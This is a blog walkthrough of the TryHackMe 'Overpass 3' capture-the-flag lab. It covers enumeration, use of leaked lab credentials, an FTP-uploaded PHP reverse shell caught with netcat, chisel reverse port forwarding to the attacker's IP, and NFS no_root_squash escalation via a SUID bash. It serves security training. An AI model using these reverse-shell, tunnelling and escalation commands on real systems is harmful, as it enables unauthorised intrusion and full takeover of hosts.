{"id":131088,"date":"2023-01-09T10:40:58","date_gmt":"2023-01-09T10:40:58","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1045890"},"modified":"2023-01-09T10:40:58","modified_gmt":"2023-01-09T10:40:58","slug":"how-i-hacked-into-a-hosting-company-and-exposed-a-vulnerability-thm-overpass-3","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/09\/how-i-hacked-into-a-hosting-company-and-exposed-a-vulnerability-thm-overpass-3\/","title":{"rendered":"How I Hacked Into a Hosting Company and Exposed a Vulnerability (THM Overpass 3)"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1045890&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<h2>BOX OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/overpass3hosting\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/overpass3hosting<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: web, user, root flags<\/li>\n<li><strong>Highlight<\/strong>: port forwarding with <code>chisel<\/code><\/li>\n<li><strong>Tools<\/strong>: <code>nmap<\/code>, <code>dirb<\/code>, <code>linpeas<\/code><\/li>\n<li><strong>Technology<\/strong>: <code>ftp<\/code>, <code>ssh<\/code>, <code>nfs<\/code><\/li>\n<\/ul>\n<h2>PREMISE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-1024x683.png\" alt=\"\" class=\"wp-image-1045929\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:<\/p>\n<ul>\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/blog.finxter.com\/tryhackme-overpass-1-compsci-students-creating-a-pw-manager-gone-bad\/\" target=\"_blank\">Overpass 1<\/a><\/li>\n<li><a href=\"https:\/\/blog.finxter.com\/thm-overpass-2-how-i-found-a-server-backdoor-with-wireshark\/\" target=\"_blank\" rel=\"noreferrer noopener\">Overpass 2<\/a><\/li>\n<\/ul>\n<p>In today\u2019s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven\u2019t learned much yet about security. <\/p>\n<p>We\u2019ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.<\/p>\n<h2>ENUMERATION<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-1024x683.png\" alt=\"\" class=\"wp-image-1045930\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>First, we\u2019ll note down our IPs in export format to use as bash variables.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.232.238\nexport myIP=10.6.2.23<\/pre>\n<p>Let\u2019s also start a regular <code>nmap<\/code> scan of all <a href=\"https:\/\/blog.finxter.com\/bash-port-scanning-ssh-as-a-python-script-tryhackme\/\" data-type=\"post\" data-id=\"914974\" target=\"_blank\" rel=\"noreferrer noopener\">ports<\/a>, and a <code>dirb<\/code> scan to sniff out web app directories.<\/p>\n<p>The <code>dirb<\/code> scan found a <code>\/backups<\/code> directory that reveals a <code>backups.zip<\/code> file.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/backups (backups.zip)\n\u2500[kalisurfer@parrot]\u2500[~]\n\u2514\u2500\u2500\u257c $dirb http:\/\/10.10.232.238 -----------------\nDIRB v2.22 By The Dark Raver\n----------------- START_TIME: Thu Jan 5 11:16:14 2023\nURL_BASE: http:\/\/10.10.232.238\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt GENERATED WORDS: 4612 -- &#8211; Scanning URL: http:\/\/10.10.232.238\/ &#8211; -- ==> DIRECTORY: http:\/\/10.10.232.238\/backups\/\n+ http:\/\/10.10.232.238\/cgi-bin\/ (CODE:403|SIZE:217)\n+ http:\/\/10.10.232.238\/index.html (CODE:200|SIZE:1770) -- &#8211; Entering directory: http:\/\/10.10.232.238\/backups\/ &#8211; --\n(!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) -----------------\nEND_TIME: Thu Jan 5 11:23:15 2023\nDOWNLOADED: 4612 - FOUND: 2\n<\/pre>\n<p>After unzipping the <code>backups.zip<\/code> file, we have two files:\u00a0<\/p>\n<pre class=\"wp-block-preformatted\"><code>priv.key\u00a0\nCustomerDetails.xlsx.pgp<\/code><\/pre>\n<p>Let\u2019s move ahead and import the <code>priv.key<\/code> file using <code>pgp<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pgp \u2013import priv.key\npgp \u2013decrypt-file CustomerDetails.xlsx.pgp\n<\/pre>\n<p>And now there is a third file: <code>CustomerDetails.xlsx<\/code><\/p>\n<p>This file is a spreadsheet with customer data including username\/passwords and <em>credit card numbers<\/em>! Let\u2019s record the passwords in our <code>notes.txt<\/code> file for later reference.<\/p>\n<pre class=\"wp-block-preformatted\"><code>username:password\nparadox ShibesAreGreat123\n0day OllieIsTheBestDog\nmuirlandoracle A11D0gsAreAw3s0me<\/code>\n<\/pre>\n<p>The <code>nmap<\/code> scan shows a few ports open: An FTP service running on port 21, SSH on 22, HTTP on 80. <\/p>\n<p>The FTP server may allow anonymous login. We\u2019ll test that out soon. First, we\u2019ll drill in a bit more on the open ports with a second <code>nmap<\/code> scan:<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"397\" height=\"133\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-81.png\" alt=\"\" class=\"wp-image-1045897\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-81.png 397w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-81-300x101.png 300w\" sizes=\"auto, (max-width: 397px) 100vw, 397px\" \/><\/figure>\n<\/div>\n<h2>WALKING THE WEBSITE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-1024x683.png\" alt=\"\" class=\"wp-image-1045933\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>There\u2019s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up\nElf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.\nMuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.\nNinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!<\/code><\/pre>\n<p>A quick look through the source code and the developer mode doesn\u2019t reveal anything more here.&nbsp;<\/p>\n<h2>CONNECTING WITH FTP<\/h2>\n<p>We test out connecting to the FTP service as user paradox with the command:<\/p>\n<pre class=\"wp-block-preformatted\"><code>lftp -u paradox $targetIP\npassword=ShibesAreGreat123 (from the xlsx spreadsheet)<\/code><\/pre>\n<p>We are connected and can see a bunch of files and a directory for backups.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"394\" height=\"403\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-82.png\" alt=\"\" class=\"wp-image-1045899\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-82.png 394w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-82-293x300.png 293w\" sizes=\"auto, (max-width: 394px) 100vw, 394px\" \/><\/figure>\n<\/div>\n<p>Now that we are connected to the web hosting service, we can upload a payload to <a href=\"https:\/\/blog.finxter.com\/python-one-line-reverse-shell\/\" data-type=\"post\" data-id=\"11536\" target=\"_blank\" rel=\"noreferrer noopener\">spawn a reverse shell<\/a> to give us an initial foothold into the box.\u00a0<\/p>\n<h2>CRAFTING A REVERSE SHELL PAYLOAD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"591\" height=\"887\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-90.png\" alt=\"\" class=\"wp-image-1045934\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-90.png 591w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-90-200x300.png 200w\" sizes=\"auto, (max-width: 591px) 100vw, 591px\" \/><\/figure>\n<\/div>\n<p>We\u2019ll use the <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/pentestmonkey\/php-reverse-shell\" target=\"_blank\">pentest monkey php reverse shell<\/a> from revshells.com. This is a good choice because PHP files autorun on websites when the page is loaded. I\u2019ve also used this payload successfully before on another box.<\/p>\n<p>Let\u2019s go ahead and copy the PHP reverse shell, add our <code>lhost<\/code> and <code>lport<\/code> to the file, and save the revshell as <code>rev.php<\/code>. I\u2019ll use port 8888.<\/p>\n<h2>UPLOADING THE PAYLOAD WITH FTP<\/h2>\n<p>Let\u2019s use the terminal window still connected to the FTP service to upload the <code>rev.php<\/code> file with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">put rev.php<\/pre>\n<p>And now, the file is in position and ready to use.<\/p>\n<h2>SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"591\" height=\"887\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-91.png\" alt=\"\" class=\"wp-image-1045937\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-91.png 591w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-91-200x300.png 200w\" sizes=\"auto, (max-width: 591px) 100vw, 591px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lvnp 8888<\/pre>\n<p>Next we\u2019ll navigate in our browser to <code>$targetIP\/revshell.php<\/code><\/p>\n<p>At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"484\" height=\"245\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-83.png\" alt=\"\" class=\"wp-image-1045903\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-83.png 484w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-83-300x152.png 300w\" sizes=\"auto, (max-width: 484px) 100vw, 484px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s search for the <code>web.flag<\/code> file with the following command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">find \/ -type f -name web.flag 2>\/dev\/null<\/pre>\n<p>The last part of this command (<code>2>\/dev\/null<\/code>) sends the error messages to a null byte, hiding all of the errors.<\/p>\n<p>And we\u2019ve found it!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/usr\/share\/httpd\/web.flag<\/pre>\n<h2>STABILIZE A REVSHELL<\/h2>\n<p>We can use a <a href=\"https:\/\/blog.finxter.com\/python-one-line-x\/\" data-type=\"post\" data-id=\"10612\" target=\"_blank\" rel=\"noreferrer noopener\">Python one-liner<\/a> to stabilize the shell enough to be able to switch users.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'<\/pre>\n<p>Now we can do a lateral move over to paradox\u2019s account with the password from the spreadsheet.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su paradox<\/pre>\n<h2>RUNNING LINPEAS ON THE TARGET MACHINE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"592\" height=\"887\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-92.png\" alt=\"\" class=\"wp-image-1045940\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-92.png 592w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-92-200x300.png 200w\" sizes=\"auto, (max-width: 592px) 100vw, 592px\" \/><\/figure>\n<\/div>\n<p>The most interesting finding of <code>linpeas<\/code> is:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Analyzing NFS Exports Files (limit 70)\n-rw-r--r--. 1 root root 54 Nov 18 2020 \/etc\/exports\n\/home\/james *(rw,fsid=0,sync,no_root_squash,insecure)\n<\/pre>\n<p>The <code>no_root_squash<\/code> is a misconfiguration that allows unprivileged users to gain root access to the machine. <\/p>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Recommended<\/strong>: <a href=\"https:\/\/blog.finxter.com\/hacking-network-file-system-nfs-a-tryhackme-walkthrough\/\" data-type=\"post\" data-id=\"1041581\" target=\"_blank\" rel=\"noreferrer noopener\">No Root Squash<\/a><\/p>\n<p>We can see that it is set in user James\u2019 home folder. So now our attack vector is becoming clearer. We will look for ways to privilege escalate over the James\u2019 account.<\/p>\n<h2>BECOMING PARADOX<\/h2>\n<p>After stabilizing the revshell we can try a lateral move and switch users to <code>paradox<\/code>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su paradox\nPassword(ShibesAreGreat123)\n<\/pre>\n<h2>EXPLOITING NFS WITH NO_ROOT_SQUASH<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-1024x683.png\" alt=\"\" class=\"wp-image-1045941\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Following up now on the <code>linpeas<\/code> results, let\u2019s investigate this NFS service a bit more. Nothing showed up in the <code>nmap<\/code> scan, but it did in the <code>linpeas<\/code> results so my hunch is that the service is firewalled from the outside. <\/p>\n<p>This isn\u2019t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rpcinfo -p | grep nfs<\/pre>\n<p>We can see in the output that NFS is running on port is 2049. We\u2019ll use a specialized secure ssh port forwarding tool, <code>chisel<\/code> to help us reroute the blocked port to our attack machine.<\/p>\n<h2>USING CHISEL TO PORT FORWARD<\/h2>\n<p>We\u2019ll need to grab <code>chisel<\/code> from the GitHub page. There are a few ways to install it from the repo. I chose to use the <a href=\"https:\/\/blog.finxter.com\/level-up-your-python-with-these-38-clever-one-liners\/\" data-type=\"post\" data-id=\"972745\" target=\"_blank\" rel=\"noreferrer noopener\">one-liner<\/a>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">curl https:\/\/i.jpillora.com\/chisel! | bash<\/pre>\n<p>Once installed, I copied the <code>chisel<\/code> bin file over to the target machine. To get this done, we\u2019ll spin up a simple <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"URL\" data-id=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" target=\"_blank\" rel=\"noreferrer noopener\">HTTP server using Python<\/a>, and then <code>curl<\/code> the file from the target machine.<\/p>\n<p>Now that <code>chisel<\/code> is on both machines, let\u2019s create the secure SSH tunnel with the following commands to set up port forwarding on the NFS service running on port 2049, but firewalled to the public.<\/p>\n<p>From the attack box:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">chisel server -p 7777 &#8211; reverse -v<\/pre>\n<p>From victim box:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.\/chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &amp;<\/pre>\n<p>The <code>&amp;<\/code> at the end of the command instructs bash to run the command in the background in a subshell.<\/p>\n<h2>BECOMING JAMES<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-1024x683.png\" alt=\"\" class=\"wp-image-1045942\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Now let\u2019s check to see if the NFS has any mountable directories available:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">showmount -e $targetIP:2049<\/pre>\n<p>Another way to check is to run:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat \/etc\/exports<\/pre>\n<p>Now let\u2019s go ahead and mount to the folder <code>\/mount<\/code> (which already exists on my machine):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo mount -t nfs $targetIP:\/ \/mount<\/pre>\n<p>The <code>user.flag<\/code> is right there in the <code>\/home\/james<\/code> directory! Checking for hidden files and directories with \u201c<code>ls -la<\/code>\u201d reveals a hidden directory (<code>.ssh<\/code>). Inside this directory we\u2019ve found an ssh key. <\/p>\n<p>Let\u2019s copy this over to our machine so that we can <code>ssh<\/code> directly into James\u2019 directory without needing their password.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"538\" height=\"342\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-84.png\" alt=\"\" class=\"wp-image-1045923\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-84.png 538w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-84-300x191.png 300w\" sizes=\"auto, (max-width: 538px) 100vw, 538px\" \/><\/figure>\n<\/div>\n<h2>GAINING ROOT PRIVILEGES WITH PERSISTENCE<\/h2>\n<p>From James\u2019 account, we should be able to both set and run files with <code>suid<\/code> bits to spawn bash as root in persistence mode. Let\u2019s first copy <code>\/bin\/bash<\/code> to our current file:<\/p>\n<p>On target box:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cp \/bin\/bash .<\/pre>\n<p>And then add execute and add the SUID bit from our mounted NFS folder on the attack box:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">chmod +xs bash<\/pre>\n<p>Last, but not least, let\u2019s run it with persistence from the target box:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.\/bash -p<\/pre>\n<p>And we are now root! Let\u2019s grab the <code>root.txt<\/code> in <code>\/root\/root.txt<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"757\" height=\"208\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-85.png\" alt=\"\" class=\"wp-image-1045924\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-85.png 757w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-85-300x82.png 300w\" sizes=\"auto, (max-width: 757px) 100vw, 757px\" \/><\/figure>\n<\/div>\n<h2>RECOMMENDED MITIGATION STEPS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-1024x683.png\" alt=\"\" class=\"wp-image-1045944\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 